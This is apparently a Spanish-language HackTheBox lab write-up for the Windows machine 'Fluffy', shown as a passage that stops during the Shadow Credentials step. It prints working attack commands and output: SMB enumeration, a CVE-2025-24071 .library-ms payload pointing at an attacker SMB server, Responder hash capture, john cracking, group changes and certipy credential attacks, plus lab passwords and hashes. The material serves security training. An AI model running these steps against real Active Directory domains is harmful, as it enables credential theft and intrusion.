This page looks best with JavaScript enabled

HackTheBox - Fluffy

Fluffy inicia con la enumeracion de recursos SMB para acceder a un PDF que documenta vulnerabilidades del sistema. Una de ellas permitio filtrar un hash NTLM a traves de un archivo .library-ms comprimido. El analisis con Bloodhound muestra permisos GenericAll y GenericWrite para un usuario, lo que permitio realizar Shadow Credentials attack a multiples usuarios para acceso por WinRM. Finalmente se identifico y exploto una plantilla vulnerable ESC16 para escalar privilegios.

Nombre Fluffy box_img_maker
OS

Windows

Puntos 20
Dificultad Easy
Fecha de Salida 2025-05-24
IP 10.10.11.69
Maker

ruycr4ft


kavigihan

Rated
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [147, 169, 716, 799, 553, 288, 214, 77, 23, 57],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Machine Information: Certified

La descripcion de la maquina emula una situacion “real” de un pentest proporcionando credenciales.

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), smb (139, 445), ldap (389), winRM (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# Nmap 7.95 scan initiated Sun May 25 03:05:51 2025 as: /usr/lib/nmap/nmap --privileged -p53,139,389,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49681,49698,49706,49739 -sV -sC -oN nmap_scan 10.10.11.69
Nmap scan report for 10.10.11.69
Host is up (0.13s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T14:10:02+00:00; +7h02m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49739/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=5/25%Time=6832C165%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-25T14:09:26
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h02m34s, deviation: 0s, median: 7h02m34s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 25 03:07:28 2025 -- 1 IP address (1 host up) scanned in 97.38 seconds

Agregamos a nuestro archivo /etc/hosts los valores fluffy.htb dc01.fluffy.htb.

Service Access

Las credenciales tienen acceso por los servicio smb y ldap.

1
2
3
4
5
6
7
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
❯ netexec ldap 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!'
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 

Bloodhound & Analysis

Ejecutamos bloodhound-ce con las credenciales conocidas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
❯ ~/htb/tools/bloodhound-ce/bloodhound.py -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 -d fluffy.htb -c All --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.fluffy.htb
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250525110540_bloodhound.zip

Creamos un wordlist basado en la lista de usuarios de bloodhound.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
❯ unzip 20250525110540_bloodhound.zip 20250525110540_users.json
Archive:  20250525110540_bloodhound.zip
 extracting: 20250525110540_users.json  
❯ jq -r '.data[].Properties.name' *users.json | tail -n +2 |  awk '{ print tolower($0) }' | cut -d '@' -f1 > users.txt
❯ wc -l users.txt
9 users.txt
❯ cat users.txt
j.fleischman
j.coffey
winrm_svc
p.agila
ldap_svc
ca_svc
krbtgt
guest
administrator

Users

Encontramos ocho usuarios dentro del grupo de Domain Users.

image

winrm_svc

winrm_svc puede acceder a la maquina por WinRM ademas pertenece al grupo Service Accounts.

image

A traves del grupo Service Accounts tiene permisos GenericWrite sobre ca_svc y ldap_svc.

image

p.agila

p.agila a traves del grupo Service Account Managers tiene permisos GenericAll sobre el grupo Service Accounts.

image

Y a traves del grupo Service Accounts tiene permisos GenericWrite sobre ca_svc, ldap_svc y winrm_svc.

image

Service Accounts - ldap_svc & ca_svc

Tanto ldap_svc como ca_svc tienen permisos GenericWrite sobre los usuarios que pertenecen al grupo Service Accounts.

image
image

ca_svc

Este usuario puede publicar certificados en el AD por pertenecer al grupo Cert Publishers.

image

j.fleischman

j.fleischman ademas de Certificate Service DCOM Access no muestra otro grupo relevante.

image

Todo indica que debemos conseguir credenciales o acceso a p.agila o algun usuario de las cuentas de servicio.

SMB - Files IT Share

Se observa que j.fleischman tiene acceso al recurso IT, lectura y escritura.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 

Realizamos una enumeracion de archivos con el modulo spider_plus de netexec.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' -M spider_plus
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.69     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.69     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.69     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.69     445    DC01             [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         10.10.11.69     445    DC01             [*] Enumerated shares
SMB         10.10.11.69     445    DC01             Share           Permissions     Remark
SMB         10.10.11.69     445    DC01             -----           -----------     ------
SMB         10.10.11.69     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.69     445    DC01             C$                              Default share
SMB         10.10.11.69     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.69     445    DC01             IT              READ,WRITE      
SMB         10.10.11.69     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.69     445    DC01             SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.11.69     445    DC01             [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/10.10.11.69.json".
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Shares:           6 (ADMIN$, C$, IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Readable Shares:  4 (IPC$, IT, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Writable Shares:  1 (IT)
SPIDER_PLUS 10.10.11.69     445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Total folders found:  23
SPIDER_PLUS 10.10.11.69     445    DC01             [*] Total files found:    13
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size average:    635.72 KB
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size min:        23 B
SPIDER_PLUS 10.10.11.69     445    DC01             [*] File size max:        3.08 MB

Encontramos que existen tres archivos dentro del recurso IT.

1
2
3
4
5
6
7
8
9
❯ cat /home/kali/.nxc/modules/nxc_spider_plus/10.10.11.69.json | jq '.IT | keys'
[
  "Everything-1.4.1.1026.x64.zip",
  "Everything-1.4.1.1026.x64/Everything.lng",
  "Everything-1.4.1.1026.x64/everything.exe",
  "KeePass-2.58.zip",
  "Upgrade_Notice.pdf"
]

Realizamos la descarga de los archivos con --get-file especificando el nombre, output y el recurso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ cat /home/kali/.nxc/modules/nxc_spider_plus/10.10.11.69.json | jq '.IT | keys'
[
  "Everything-1.4.1.1026.x64.zip",
  "Everything-1.4.1.1026.x64/Everything.lng",
  "Everything-1.4.1.1026.x64/everything.exe",
  "KeePass-2.58.zip",
  "Upgrade_Notice.pdf"
]
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file Everything-1.4.1.1026.x64.zip files/Everything-1.4.1.1026.x64.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "Everything-1.4.1.1026.x64.zip" to "files/Everything-1.4.1.1026.x64.zip"
SMB         10.10.11.69     445    DC01             [+] File "Everything-1.4.1.1026.x64.zip" was downloaded to "files/Everything-1.4.1.1026.x64.zip"
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file KeePass-2.58.zip files/KeePass-2.58.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "KeePass-2.58.zip" to "files/KeePass-2.58.zip"
SMB         10.10.11.69     445    DC01             [+] File "KeePass-2.58.zip" was downloaded to "files/KeePass-2.58.zip"
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --get-file Upgrade_Notice.pdf files/Upgrade_Notice.pdf --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying "Upgrade_Notice.pdf" to "files/Upgrade_Notice.pdf"
SMB         10.10.11.69     445    DC01             [+] File "Upgrade_Notice.pdf" was downloaded to "files/Upgrade_Notice.pdf"

Software

El archivo de KeePass unicamente contiene el software, no encontramos alguna base de datos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
❯ unzip KeePass-2.58.zip -d keepassfolder
Archive:  KeePass-2.58.zip
  inflating: keepassfolder/KeePass.chm  
  inflating: keepassfolder/KeePass.exe  
  inflating: keepassfolder/KeePass.exe.config  
  inflating: keepassfolder/KeePass.XmlSerializers.dll  
  inflating: keepassfolder/KeePassLibC32.dll  
  inflating: keepassfolder/KeePassLibC64.dll  
   creating: keepassfolder/Languages/
  inflating: keepassfolder/License.txt  
   creating: keepassfolder/Plugins/
  inflating: keepassfolder/ShInstUtil.exe  
   creating: keepassfolder/XSL/
  inflating: keepassfolder/XSL/KDBX_Common.xsl  
  inflating: keepassfolder/XSL/KDBX_DetailsFull_HTML.xsl  
  inflating: keepassfolder/XSL/KDBX_DetailsLight_HTML.xsl  
  inflating: keepassfolder/XSL/KDBX_PasswordsOnly_TXT.xsl  
  inflating: keepassfolder/XSL/KDBX_Tabular_HTML.xsl  
❯ cat KeePass.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
	<startup useLegacyV2RuntimeActivationPolicy="true">
		<supportedRuntime version="v4.0" />
		<supportedRuntime version="v2.0.50727" />
	</startup>
	<runtime>
		<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
			<dependentAssembly>
				<assemblyIdentity name="KeePass"
					publicKeyToken="fed2ed7716aecf5c"
					culture="neutral" />
				<bindingRedirect oldVersion="2.0.9.0-2.57.127.127"
					newVersion="2.58.0.0" />
			</dependentAssembly>
		</assemblyBinding>
		<enforceFIPSPolicy enabled="false" />
		<loadFromRemoteSources enabled="true" />
	</runtime>
	<appSettings>
		<add key="EnableWindowsFormsHighDpiAutoResizing" value="true" />
	</appSettings>
</configuration>

Everithing tambien, unicamente el software.

1
2
3
4
5
6
7
8
❯ unzip Everything-1.4.1.1026.x64.zip -d everything
Archive:  Everything-1.4.1.1026.x64.zip
  inflating: everything/everything.exe  
  inflating: everything/Everything.lng  
❯ file *
everything.exe: PE32+ executable for MS Windows 5.02 (GUI), x86-64, 6 sections
Everything.lng: data

Notice PDF

En los metadatos del archivo pdf encontramos un nombre de usuario p.agila.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
❯ exiftool Upgrade_Notice.pdf
ExifTool Version Number         : 13.25
File Name                       : Upgrade_Notice.pdf
Directory                       : .
File Size                       : 170 kB
File Modification Date/Time     : 2025:05:25 03:39:24-04:00
File Access Date/Time           : 2025:05:29 02:57:05-04:00
File Inode Change Date/Time     : 2025:05:25 03:39:24-04:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 2
Tagged PDF                      : Yes
Language                        : en
Title                           : Upgrade Notice For IT Department
Create Date                     : 2025:05:17 07:22:32+00:00
Modify Date                     : 2025:05:17 07:22:32+00:00
Keywords                        : DAGnmrYlJoI, BAF-XVRpOno, 0
Author                          : p.agila

Ademas, el contenido muestra una lista de Vulnerabilidades que deben de ser parcheadas.

image

1
2
3
4
5
6
- CVE-2025-24996
- CVE-2025-24071
- CVE-2025-46785
- CVE-2025-29968
- CVE-2025-21193
- CVE-2025-3445

CVE-2025-24071

Se explica el CVE-2025-24071 que, es posible filtrar el Hash NTLM a traves de un archivo .library-ms conteniendo la direccion de un servidor SMB (\\10.10.10.10\share\) comprimido en un archivo rar/zip.

El archivo .library-ms tiene una estructura XML, tras ser parseado por el servicio de indexacion de Windows Explorer se logra el ataque.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription
	xmlns="http://schemas.microsoft.com/windows/2009/library">
	<searchConnectorDescriptionList>
		<searchConnectorDescription>
			<simpleLocation>
				<url>\\\\10.10.10.10\\shared</url>
			</simpleLocation>
		</searchConnectorDescription>
	</searchConnectorDescriptionList>
</libraryDescription>

Clonamos el PoC listado en el post localmente.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
❯ git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
Cloning into 'CVE-2025-24071_PoC'...
remote: Enumerating objects: 18, done.
remote: Counting objects: 100% (18/18), done.
remote: Compressing objects: 100% (16/16), done.
remote: Total 18 (delta 4), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (18/18), 6.30 KiB | 6.30 MiB/s, done.
Resolving deltas: 100% (4/4), done.
cd CVE-2025-24071_PoC
❯ ll
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025  poc.py
.rw-rw-r-- kali kali  966 B Thu May 29 03:12:56 2025  README.md

Ejecutamos, especificando el nombre de archivo y direccion IP.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
❯ python poc.py
Enter your file name: sckull
Enter IP (EX: 192.168.1.162): 10.10.14.58
completed
❯ ll
.rw-rw-r-- kali kali  320 B Thu May 29 03:14:15 2025  exploit.zip
.rw-rw-r-- kali kali 1003 B Thu May 29 03:12:56 2025  poc.py
.rw-rw-r-- kali kali  966 B Thu May 29 03:12:56 2025  README.md

Ejecutamos responder especificando nuestra interfaz.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
❯ sudo responder -I tun0 -wF
[sudo] password for kali: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [ON]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.58]
    Responder IPv6             [dead:beef:2::1038]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-A27FEBQU5KE]
    Responder Domain Name      [ZEUH.LOCAL]
    Responder DCE-RPC Port     [46470]

[+] Listening for events...

Realizamos la subida del archivo a traves de netexec con la flag --put-file especificando el recurso.

1
2
3
4
5
6
❯ netexec smb 10.10.11.69 -u j.fleischman -p 'J0elTHEM4n1990!' --put-file exploit.zip exploit.zip --share IT
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\j.fleischman:J0elTHEM4n1990! 
SMB         10.10.11.69     445    DC01             [*] Copying exploit.zip to exploit.zip
SMB         10.10.11.69     445    DC01             [+] Created file exploit.zip on \\IT\exploit.zip

Luego de unos segundos responder muestra que logro capturar el hash de p.agila

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.69
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash     : p.agila::FLUFFY:5f2c4cd66f7e65f2:E7A7F7B95FBDF47F8FEC503FFC92D2BC:01010000000000008068AC5A49D0DB01558D483CC41DD5B20000000002000800470036003400500001001E00570049004E002D0038003600350030004B004B004100390036004E00390004003400570049004E002D0038003600350030004B004B004100390036004E0039002E0047003600340050002E004C004F00430041004C000300140047003600340050002E004C004F00430041004C000500140047003600340050002E004C004F00430041004C00070008008068AC5A49D0DB010600040002000000080030003000000000000000010000000020000058D56808655BFB077FF64A97091779CB9E8CE1180544D1478E1A00AE91A115D30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00350038000000000000000000
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila
[*] Skipping previously captured hash for FLUFFY\p.agila

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash de responder para la direccion 10.10.11.69 logrando obtener su valor en texto plano.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
❯ john SMB-NTLMv2-SSP-10.10.11.69.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 21 password hashes with 21 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
prometheusx-303  (p.agila)     
21g 0:00:00:23 DONE (2025-05-25 11:54) 0.8947g/s 192496p/s 4042Kc/s 4042KC/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

User - a.gila

Las credenciales nos permite el acceso por smb y ldap.

1
2
3
4
5
6
7
❯ netexec smb 10.10.11.69 -u p.agila -p 'prometheusx-303'
SMB         10.10.11.69     445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.69     445    DC01             [+] fluffy.htb\p.agila:prometheusx-303 
❯ netexec ldap 10.10.11.69 -u p.agila -p 'prometheusx-303'
LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:prometheusx-303 

Uno de los usuarios de interes es ca_svc, ya que con este podriamos ejecutar Certipy y verificar plantillas vulnerables.

GenericAll -> Service Accounts

Agregamos a p.agila al grupo Service Accounts.

1
2
3
# add p.agila to service accounts
pth-net rpc group addmem "Service Accounts" p.agila -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69
net rpc group members "Service Accounts" -U "fluffy.htb/p.agila%prometheusx-303" -S 10.10.11.69

Shadow Credentials

Con el permiso de GenericWrite podemos obtener el hash del usuario realizado Shadow Credentials Attack mediante certipy. Ejecutamos este ataque para los tres usuarios dentro del grupo Service Accounts iniciando con el usuario ca_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# GenericWrite on ca_svc, ldap_svc, winrm_svc
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ca_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8'
[*] Adding Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '1743faeb-8e62-89f4-20bc-7b0f7913cfe8' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_svc@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_svc.ccache'
[*] Wrote credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8

Obtuvmios de la misma forma para el usuario ldap_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ certipy-ad shadow auto -u p.agila@fluffy.htb -p 'prometheusx-303' -account ldap_svc
Certipy v5.0.0 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: FLUFFY.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'ldap_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca'
[*] Adding Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
[*] Successfully added Key Credential with device ID 'ad7978f5-ef6c-d4fb-6154-5708e8f673ca' to the Key Credentials for 'ldap_svc'
